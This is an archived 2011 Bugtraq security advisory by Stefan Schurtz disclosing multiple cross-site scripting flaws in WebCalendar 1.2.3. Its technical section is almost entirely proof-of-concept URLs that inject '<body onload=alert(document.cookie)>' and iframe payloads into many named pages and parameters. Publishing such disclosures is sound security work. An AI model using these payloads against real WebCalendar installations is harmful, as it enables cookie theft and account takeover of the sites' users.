lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Mon, 4 Jul 2011 06:46:09 GMT
From: sschurtz@...nline.de
To: bugtraq@...urityfocus.com
Subject: Multiple Cross-Site Scripting vulnerabilities in WebCalendar


Advisory:           Multiple Cross-Site Scripting vulnerabilities in WebCalendar
Advisory ID:        SSCHADV2011-008
Author:             Stefan Schurtz
Affected Software:  Version 1.2.3 and probably prior versions
Vendor URL:         http://www.k5n.us/webcalendar.php
Vendor Status:      informed
CVE-ID:             -

==========================
Vulnerability Description:
==========================

This is a Cross-Site Scripting vulnerability

==================
Technical Details:
==================

http://[target]/webapps/webcalendar/about/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/about/"><body onload=alert('XSS')>

http://[target]/webapps/webcalendar/colors.php?color="><iframe onload=alert(document.cookie)>

http://[target]/webapps/webcalendar/datesel.php?form="><iframe onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/datesel.php?form=3&fday="><iframe onload=alert(document.cookie)>&fmonth=3&fyear=3&date=20110601
http://[target]/webapps/webcalendar/datesel.php?form=3&fday=3&fmonth="><iframe onload=alert(document.cookie)>&fyear=3&date=20110601
http://[target]/webapps/webcalendar/datesel.php?form=3&fday=3&fmonth=3&fyear="><iframe onload=alert(document.cookie)>&date=20110601

http://[target]/webapps/webcalendar/year.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/select_user.php/"><body onload=alert(document.cookie)>

http://[target]/webapps/webcalendar/week.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/month.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/search_handler.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/day.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/datesel.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/edit_entry.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/search.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/help_edit_entry.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/catsel.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/help_index.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/help_docs.php/"><body onload=alert(document.cookie)>
http://[target]/webapps/webcalendar/help_bug.php/"><body onload=alert(document.cookie)>

=========
Solution:
=========

-

====================
Disclosure Timeline:
====================

02-Jul-2011 - informed developers
02-Jul-2011 - Release date of this security advisory

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.k5n.us/webcalendar.php
http://www.rul3z.de/advisories/SSCHADV2011-008.txt


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux - Powered by OpenVZ